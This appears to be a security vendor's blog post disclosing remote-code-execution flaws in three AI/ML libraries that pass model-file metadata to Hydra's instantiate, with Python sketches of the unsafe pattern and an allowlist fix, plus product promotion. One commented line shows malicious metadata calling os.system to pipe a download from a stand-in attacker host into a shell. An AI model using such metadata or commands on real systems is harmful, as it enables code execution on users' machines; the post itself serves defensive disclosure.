AI Libraries Under Siege: Uncovering Hidden Vulnerabilities in Popular AI/ML Tools
Imagine a world where the very tools powering AI innovation could be weaponized against us. This isn't science fiction; it's a stark reality we've uncovered. Three widely used AI/ML libraries, developed by tech giants Apple, Salesforce, and NVIDIA, contain vulnerabilities that could allow remote code execution (RCE) when loading seemingly innocent model files. These flaws have been hiding in plain sight, potentially exposing countless AI applications to attack.
The Culprits: Popular Libraries with a Dark Secret
These vulnerable libraries, all open-source and hosted on GitHub, are:
- NeMo (NVIDIA): A PyTorch-based framework for developing diverse AI/ML models, boasting over 700 models on HuggingFace with millions of downloads.
- Uni2TS (Salesforce): A PyTorch library powering Salesforce's Moirai, a time series forecasting model with hundreds of thousands of downloads.
- FlexTok (Apple & EPFL VILAB): A Python framework enabling image processing in AI/ML models, primarily used by EPFL VILAB models with tens of thousands of downloads.
The Vulnerability: A Metadata Backdoor
The issue lies in how these libraries handle metadata within model files. Each uses a third-party library called Hydra to instantiate Python classes named in that metadata. The problem? Vulnerable versions pass the metadata to Hydra's instantiate function without sanitization, so the metadata can name any importable callable along with its arguments. An attacker who embeds a malicious target in the metadata gets their code executed automatically the moment the model is loaded. Notably, newer 'safe' file formats like safetensors don't help here: the attack lives in the configuration metadata, not in the tensor data those formats were designed to secure.
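To make the mechanism concrete, here is a minimal plain-Python sketch of what an unrestricted Hydra-style instantiate does. This illustrates the pattern, not Hydra's actual code; `unsafe_instantiate` is a hypothetical name for the illustration:

```python
import importlib

def unsafe_instantiate(config: dict):
    """Resolve a dotted path from (untrusted) metadata and call it.

    This mirrors the core behavior of a Hydra-style instantiate: the
    metadata itself decides which callable gets imported and invoked.
    """
    module_path, _, attr_name = config["_target_"].rpartition(".")
    target = getattr(importlib.import_module(module_path), attr_name)
    return target(*config.get("_args_", []))

# Benign metadata instantiates a harmless class...
counts = unsafe_instantiate({"_target_": "collections.Counter", "_args_": ["aab"]})
print(counts)

# ...but attacker-controlled metadata can name ANY importable callable, e.g.:
# {"_target_": "os.system", "_args_": ["curl attacker.example | sh"]}  # RCE on load
```

Because the target string comes straight from the model file, loading the model is all it takes to trigger the call.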
A Race Against Time: Patches and Protections
Fortunately, the vendors have been notified and have taken action:
- NVIDIA patched NeMo (CVE-2025-23304) with a new 'safe_instantiate' function that validates metadata before execution.
- Salesforce addressed the Uni2TS vulnerability (CVE-2026-22584) by implementing an allowlist and strict validation for executable modules.
- Apple & EPFL VILAB updated FlexTok to use YAML for configuration parsing and added an allowlist of classes for Hydra's instantiate function.
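The fixes above share one core idea: validate the instantiation target against an explicit allowlist before executing anything. Here is a minimal sketch of that pattern; the allowlist contents and the `safe_instantiate` body are illustrative, not the vendors' actual patch code:

```python
import importlib

# Illustrative allowlist -- a real patch enumerates the library's own classes.
ALLOWED_TARGETS = {
    "collections.Counter",
    "collections.OrderedDict",
}

def safe_instantiate(config: dict):
    """Instantiate a target from model metadata only if it is allowlisted."""
    target_path = config["_target_"]
    if target_path not in ALLOWED_TARGETS:
        raise ValueError(f"Refusing to instantiate untrusted target: {target_path}")
    module_path, _, attr_name = target_path.rpartition(".")
    target = getattr(importlib.import_module(module_path), attr_name)
    return target(*config.get("_args_", []))

safe_instantiate({"_target_": "collections.Counter", "_args_": ["ab"]})   # allowed
# safe_instantiate({"_target_": "os.system", "_args_": ["id"]})           # raises ValueError
```

The validation happens before any import or call, so a malicious `_target_` in model metadata is rejected rather than executed.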
The Bigger Picture: A Call for Vigilance
While no exploitation has been observed in the wild so far, the potential for harm is significant: an attacker could fork a popular model, add malicious metadata under the guise of improvements, and redistribute it. This highlights a critical issue: the vast attack surface created by the proliferation of AI/ML libraries and the limited scrutiny of metadata on platforms like HuggingFace.
Palo Alto Networks to the Rescue
Our Prisma AIRS solution can identify models exploiting these vulnerabilities and extract their payloads. Additionally, our Cortex Cloud Vulnerability Management and Unit 42 AI Security Assessment services provide comprehensive protection and risk mitigation for AI deployments.
The Debate: Balancing Innovation and Security
This discovery raises important questions: How can we ensure the security of AI models without stifling innovation? Should platforms like HuggingFace implement stricter metadata scrutiny? The AI community needs to engage in open dialogue to address these challenges and build a more secure future for AI.
What's Next?
As AI continues to evolve, so will the threats. We urge developers and users to remain vigilant, prioritize security in their AI practices, and leverage tools like those offered by Palo Alto Networks to protect their AI investments. The battle for AI security is ongoing, and we must all play our part.